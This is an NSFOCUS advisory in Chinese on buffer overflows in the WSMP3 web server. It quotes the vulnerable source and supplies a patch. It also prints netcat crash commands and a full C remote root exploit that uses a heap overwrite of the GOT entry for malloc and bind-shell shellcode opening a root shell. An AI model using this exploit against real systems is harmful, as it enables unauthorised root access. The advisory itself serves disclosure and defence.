首页 -> 安全研究

安全研究

安全漏洞
WSMP3多个缓冲区溢出漏洞

发布日期:2002-11-25
更新日期:2002-12-03

受影响系统:
WSMP3 web_server 0.0.6
WSMP3 web_server 0.0.5
WSMP3 web_server 0.0.4
WSMP3 web_server 0.0.3
WSMP3 web_server 0.0.2
WSMP3 web_server 0.0.1
描述:
BUGTRAQ  ID: 6239,6240

WSMP3是一款WEB服务程序,也可以由shoutcast-server调用支持MP3播放。

WSMP3当拷贝数据到本地缓冲区时缺少正确边界检查,远程或者本地攻击者可以利用这些漏洞对WSMP3进行缓冲区溢出攻击,以WSMP3进程在系统上执行任意指令。

'src/web_server.c'代码中存在多个缓冲区溢出错误:

main() function:
  __
  1360  int main(int argc, char *argv[],char *envp[])
        ...
  1363    char recvBuffer[BUFSIZE]; // 32768
        ...
  1526            i=recv(sock,recvBuffer,BUFSIZE,0);
        ...
  1592        conn_req=parse_request(recvBuffer); // parse_request();
  --

parse_request() function:
   __
   560  req_descriptor* parse_request(char *req)
        ...
   563    char reqcpy[1024]; // 1024 ??
        ...
   572    strcpy(reqcpy,req); // 基于栈的溢出.
   573    ritorno->action=get_op(reqcpy); // get_op();
        ...
   575    strcpy(reqcpy,req);
        :
        :
   --

由于使用strcpy()没有进行边界检查而发生基于栈的缓冲区溢出。

另外一个问题是基于堆的malloc()/free()问题:

get_op() function:
   --
   671  char* get_op(char *buf)
        ...
   673    char* op;
   674    int i;
   675    if((op=(char *)malloc(10))==NULL)
        ...
   684        while(buf[i]!=' ')
   685          {
   686            op[i]=buf[i]; // This part is very dangerous.
   687            i++;
   688          }
   689        op[i]='\0';
        ...
   692    return op;
   --

没有正确检查0x20(' ')的存储,而且malloc(10)做了声明,超长的数据可以导致后续操作发生堆溢出:

--------------------------------------------
get_op() -return(op)-> parse_request()
parse_request() -return(ritorno)-> conn_req
rem_req_descriptor(conn_req);
--------------------------------------------

rem_req_descriptor() function:
   __
   504  void rem_req_descriptor(req_descriptor *desc)
   505  {
   506    free(desc->action);
   507    free(desc->what);
   508    free(desc->host);
   509    free(desc->agent);
   510    free(desc->accept);
   511    free(desc->lang);
   512    free(desc->enc);
   513    free(desc->charset);
   514    free(desc->keep);
   515    free(desc->conn);
   516    free(desc->referer);
   517    free(desc->pragma);
   518    free(desc->contType);
   519    free(desc->contLength);
   520    free(desc->content);
   521
   522    free(desc);
   --

<*来源:dong-h0un U (xploit@hackermail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103823955412620&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

dong-h0un U (xploit@hackermail.com)提供了如下测试方法:

第一个基于栈的溢出:

bash$ (echo "GET `perl -e 'print \"x\"x2000'`";cat)|nc 0 8000

第二个基于堆的溢出:

bash$ (echo "x82-x0x-test";cat)|nc 0 8000

dong-h0un U(xploit@hackermail.com) 提供了如下测试程序:

/*
**
** Proof of Concept WSMP3 Remote root exploit
**                               by Xpl017Elz
** __
** Testing exploit:
**
** bash$ ./0x82-Remote.wsmp3xpl -h localhost -p 8000
**
**  Proof of Concept WSMP3 Remote root exploit
**                                by Xpl017Elz
**                  
**  Try `./0x82-Remote.wsmp3xpl -?' for more information.
**
**  [1] Make fake chunk.
**  [2] Make shellcode.
**  [3] Send exploit (bindshell) code.
**  [4] Waiting, executes the shell !
**  [5] Trying localhost:36864 ...
**  [6] Connected to localhost:36864 !
**
**  [*] Executed shell successfully !
**
** Linux xpl017elz 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
** 6(disk),10(wheel)
** bash#
**
** GOT malloc address:
**
** bash$ objdump --dynamic-reloc web_server | grep malloc
** 08051bac R_386_JUMP_SLOT   malloc
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/

#include <stdio.h>
#include <unistd.h>
#include <getopt.h>
#include <netdb.h>
#include <netinet/in.h>

#define HOST "localhost"
#define PORT 8000

struct op_st
{
    int num;
    char *os;
    unsigned long retloc;
    unsigned long stkaddr;
    unsigned long retaddr;
}; /* only test */
struct op_st pl_form[]={
    {
    0,
    "RedHat Linux",
    /* malloc */
    0x08051bac,
    /* stack address */
    0xbfff7d18,
    /* heap address */
    0x0805b062
    }
};

int setsock(char *hostname,int port);
void getshell(int sock);
void re_conenter(int sock);
void banrl(char *args);
void usage(char *args);

int setsock(char *hostname,int port)
{
    int sock;
    struct hostent *sxp;
    struct sockaddr_in sxp_addr;
    
    if((sxp=gethostbyname(hostname))==NULL)
    {
    herror("gethostbyname() error");
    return(-1);
    }
    if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
    perror("socket() error");
    return(-1);
    }
    
    sxp_addr.sin_family=AF_INET;
    sxp_addr.sin_port=htons(port);
    sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
    bzero(&(sxp_addr.sin_zero),8);
    
    if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
    {
    perror("connect() error");
    return(-1);
    }
    
    return(sock);
}

void getshell(int sock)
{
    int died;
    char *command="uname -a; id; export TERM=vt100; exec bash -i\n";
    char readbuf[1024];
    fd_set rset;
    
    memset(readbuf,0x00,1024);
    
    fprintf(stdout," [*] Executed shell successfully !\n\n");
    send(sock,command,strlen(command),0);
    
    for(;;)
    {
    fflush(stdout);
    FD_ZERO(&rset);
    FD_SET(sock,&rset);
    FD_SET(STDIN_FILENO,&rset);
    select(sock+1,&rset,NULL,NULL,NULL);
    
    if(FD_ISSET(sock,&rset))
    {
        died=read(sock,readbuf,1024);
        if(died<=0)
        {
        exit(0);
        }
        readbuf[died]=0;
        printf("%s",readbuf);
    }
    if(FD_ISSET(STDIN_FILENO,&rset))
    {
        died=read(STDIN_FILENO,readbuf,1024);
        if(died>0)
        {
        readbuf[died]=0;
        write(sock,readbuf,died);
        }
    }
    }
    return;
}

void re_conenter(int sock)
{
    if(sock==-1)
    {
    fprintf(stdout," [-] Failed.\n\n");
    fprintf(stdout," Happy Exploit ! :-)\n\n");
    exit(-1);
    }
}

int main(int argc,char *argv[])
{
    int at_sock;
    int ts_sock;
    int port=PORT;
    int roup;
    char ttatk_code[36864];
    char hostname[0x82]=HOST;
    char main_str[] = /* BIND SHELL ON PORT TCP/36864  */
    //------------------- main: -------------------//
    "\xeb\x72"                        /* jmp callz */
    //------------------- start: ------------------//
    "\x5e"                            /* popl %esi */
    //------------------ socket() -----------------//
    "\x29\xc0"                  /* subl %eax, %eax */
    "\x89\x46\x10"        /* movl %eax, 0x10(%esi) */
    "\x40"                            /* incl %eax */
    "\x89\xc3"                  /* movl %eax, %ebx */
    "\x89\x46\x0c"        /* movl %eax, 0x0c(%esi) */
    "\x40"                            /* incl %eax */
    "\x89\x46\x08"        /* movl %eax, 0x08(%esi) */
    "\x8d\x4e\x08"        /* leal 0x08(%esi), %ecx */
    "\xb0\x66"                  /* movb $0x66, %al */
    "\xcd\x80"                        /* int $0x80 */
    //------------------- bind() ------------------//
    "\x43"                            /* incl %ebx */
    "\xc6\x46\x10\x10"   /* movb $0x10, 0x10(%esi) */
    "\x66\x89\x5e\x14"     /* movw %bx, 0x14(%esi) */
    "\x88\x46\x08"         /* movb %al, 0x08(%esi) */
    "\x29\xc0"                  /* subl %eax, %eax */
    "\x89\xc2"                  /* movl %eax, %edx */
    "\x89\x46\x18"        /* movl %eax, 0x18(%esi) */
    "\xb0\x90"                  /* movb $0x90, %al */
    "\x66\x89\x46\x16"     /* movw %ax, 0x16(%esi) */
    "\x8d\x4e\x14"        /* leal 0x14(%esi), %ecx */
    "\x89\x4e\x0c"        /* movl %ecx, 0x0c(%esi) */
    "\x8d\x4e\x08"        /* leal 0x08(%esi), %ecx */
    "\xb0\x66"                  /* movb $0x66, %al */
    "\xcd\x80"                        /* int $0x80 */
    //------------------ listen() -----------------//
    "\x89\x5e\x0c"        /* movl %ebx, 0x0c(%esi) */
    "\x43"                            /* incl %ebx */
    "\x43"                            /* incl %ebx */
    "\xb0\x66"                  /* movb $0x66, %al */
    "\xcd\x80"                        /* int $0x80 */
    //------------------ accept() -----------------//
    "\x89\x56\x0c"        /* movl %edx, 0x0c(%esi) */
    "\x89\x56\x10"        /* movl %edx, 0x10(%esi) */
    "\xb0\x66"                  /* movb $0x66, %al */
    "\x43"                            /* incl %ebx */
    "\xcd\x80"                        /* int $0x80 */
    //---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----//
    "\x86\xc3"                   /* xchgb %al, %bl */
    "\xb0\x3f"                  /* movb $0x3f, %al */
    "\x29\xc9"                  /* subl %ecx, %ecx */
    "\xcd\x80"                        /* int $0x80 */
    "\xb0\x3f"                  /* movb $0x3f, %al */
    "\x41"                            /* incl %ecx */
    "\xcd\x80"                        /* int $0x80 */
    "\xb0\x3f"                  /* movb $0x3f, %al */
    "\x41"                            /* incl %ecx */
    "\xcd\x80"                        /* int $0x80 */
    //------------------ execve() -----------------//
    "\x88\x56\x07"         /* movb %dl, 0x07(%esi) */
    "\x89\x76\x0c"        /* movl %esi, 0x0c(%esi) */
    "\x87\xf3"                 /* xchgl %esi, %ebx */
    "\x8d\x4b\x0c"        /* leal 0x0c(%ebx), %ecx */
    "\xb0\x0b"                  /* movb $0x0b, %al */
    "\xcd\x80"                        /* int $0x80 */
    //------------------- callz: ------------------//
    "\xe8\x89\xff\xff\xff"           /* call start */
    "/bin/sh"; /* 128byte */

#define plus_4str(x0x) x0x+=4
    int x0x_num=0;
    int x0x_size=0;
#define BUF_LEN 1024
    char *debug_test;
    char code_128len[BUF_LEN];
    char x82_16x0x[]={ /* 16byte */
    0x82,0x82,0x82,0x82,0x82,
    0x82,0x82,0x82,0x82,0x82,
    0x82,0x82,0x82,0x82,0x82,
    0x82
    };
    char nop_n_jump[4]={0x41,0xeb,0x0c,0x42};
    int nop_12jump=0;
    int ok_cont=0;
    int target_type_number=0;
    char p_rev_size[4]={0xff,0xff,0xff,0xfc}; /* chunk size */
    char size_fd[4]={0xff,0xff,0xff,0xff}; /* data section size */
    char atk_chunk[BUF_LEN];
    unsigned long retloc=pl_form[target_type_number].retloc;
    unsigned long retaddr=pl_form[target_type_number].retaddr;//.stkaddr;

    memset(ttatk_code,0x00,36864);
    memset(atk_chunk,0x00,BUF_LEN);
    memset(code_128len,0x00,BUF_LEN);
    
    (void)banrl(argv[0]);
    while((roup=getopt(argc,argv,"R:r:S:s:H:h:P:p:"))!=EOF)
    {
    switch(roup)
    {
        case 'R':
        case 'r':
        retloc=strtoul(optarg,NULL,0);
        break;
        
        case 'S':
        case 's':
        retaddr=strtoul(optarg,NULL,0);
        break;
        
        case 'H':
        case 'h':
        memset(hostname,0x00,0x82);
        strncpy(hostname,optarg,0x82);
        break;
        
        case 'P':
        case 'p':
        port=atoi(optarg);
        break;
        
        case '?':
        (void)usage(argv[0]);
        break;
    }
    }

    //--- make fake chunk ---//
    fprintf(stdout," [1] Make fake chunk.\n");
    for(x0x_num=0;x0x_num<strlen(x82_16x0x);x0x_num++)
    atk_chunk[x0x_num]=x82_16x0x[x0x_num];
    *(long*)&atk_chunk[x0x_num]=0xfffffffc; // prev_size
    plus_4str(x0x_num);
    *(long*)&atk_chunk[x0x_num]=0xffffffff; // size(P)
    plus_4str(x0x_num);
    *(long*)&atk_chunk[x0x_num]=retloc-0x0c; // Forward pointer
    plus_4str(x0x_num);
    *(long*)&atk_chunk[x0x_num]=retaddr; // Back pointer
    plus_4str(x0x_num);

    //--- make code ---//
    fprintf(stdout," [2] Make shellcode.\n");
    for(nop_12jump=0;nop_12jump<0x190;plus_4str(nop_12jump))
    *(long*)&code_128len[nop_12jump]=0x41eb0c42;
    for(x0x_num=0,ok_cont=nop_12jump;x0x_num<strlen(main_str);x0x_num++)
    code_128len[ok_cont++]=main_str[x0x_num];

    //--- fake chunk + 0x20 + (nop + 12byte jmpcode + nop + shellcode) ---//
    snprintf(ttatk_code,36864,
        "%s%s%s\r\n",atk_chunk,"\x20",code_128len);

    fprintf(stdout," [3] Send exploit (bindshell) code.\n");
    { // Try two times connections. It's Point. :-)
    /* 1 */
    at_sock=setsock(hostname,port);
    re_conenter(at_sock);
    send(at_sock,ttatk_code,strlen(ttatk_code),0);
    close(at_sock);
    /* 2 */
    at_sock=setsock(hostname,port);
    re_conenter(at_sock);
    send(at_sock,ttatk_code,strlen(ttatk_code),0);
    }
    fprintf(stdout," [4] Waiting, executes the shell !\n");
    sleep(3);
    fprintf(stdout," [5] Trying %s:36864 ...\n",hostname);
    /* 3 */
    ts_sock=setsock(hostname,36864);
    re_conenter(ts_sock);
    fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname);
    // Execute bash shell
    getshell(ts_sock);

}

void usage(char *args)
{
    fprintf(stderr,"\n Default Usage: %s -[option] [arguments]\n\n",args);
    fprintf(stderr,"\t -h [hostname] - target host\n");
    fprintf(stderr,"\t -p [port]     - port number\n");
    fprintf(stderr,"\t -r [addr]     - retloc addr (GOT malloc)\n");
    fprintf(stderr,"\t -s [addr]     - &shellcode addr\n");
    fprintf(stderr," Example: %s -h localhost -p 8000\n",args);
    fprintf(stdout,"\n Happy Exploit !\n\n");
    exit(0);
}

void banrl(char *args)
{
    fprintf(stdout,"\n Proof of Concept WSMP3 Remote root exploit");
    fprintf(stdout,"\n                               by Xpl017Elz\n\n");
    fprintf(stdout," Try `%s -?' for more information.\n\n",args);
}

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* "dong-h0un U" <xploit@hackermail.com>提供了如下第三方补丁:

=== web_server.patch ===

--- web_server.c    Tue Nov 12 03:30:21 2002
+++ web_server.patch.c    Mon Nov 18 12:26:28 2002
@@ -569,51 +569,51 @@
     }
   else init_req_descriptor(ritorno);

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->action=get_op(reqcpy);

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   if(!strcmp(ritorno->action,"CHA"))  ritorno->what=nomefile(reqcpy,1) ;
   else ritorno->what=nomefile(reqcpy,0);

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->host=gimme_line(reqcpy,"Host: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->agent=gimme_line(reqcpy,"User-Agent: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->accept=gimme_line(reqcpy,"Accept: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->lang=gimme_line(reqcpy,"Accept-Language: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->enc=gimme_line(reqcpy,"Accept-Encoding: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->charset=gimme_line(reqcpy,"Accept-Charset: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->keep=gimme_line(reqcpy,"Keep-Alive: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->conn=gimme_line(reqcpy,"Connection: ");


-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->referer=gimme_line(reqcpy,"Referer: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->pragma=gimme_line(reqcpy,"Pragma: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->contType=gimme_line(reqcpy,"Content-Type: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->contLength=gimme_line(reqcpy,"Content-Length: ");

-  strcpy(reqcpy,req);
+  strncpy(reqcpy,req,255+15);
   ritorno->content=gimme_content(reqcpy);
   return ritorno;
}
@@ -671,25 +671,21 @@
char* get_op(char *buf)
{
   char* op;
+  char* method;
   int i;
   if((op=(char *)malloc(10))==NULL)
     {
       printf("Not enough memory!\n");
       exit(1);
     }
-  if(buf!=NULL && (strlen(buf)>=3))
+  if(buf[0]==0x20)
     {
-      //strncpy(op,buf,3);
-      i=0;
-      while(buf[i]!=' ')
-    {
-      op[i]=buf[i];
-      i++;
-    }
-      op[i]='\0';
+      buf[0]='\n';
     }
-  else op=NULL;
-  return op;
+  buf[strlen(buf)]=' ';
+  strncpy(op,buf,10-1);
+  method=(char*)strtok(op," ");
+  return method;
}

=== eof ===

厂商补丁:

WSMP3
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://wsmp3.sourceforge.net/

浏览次数:2927
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客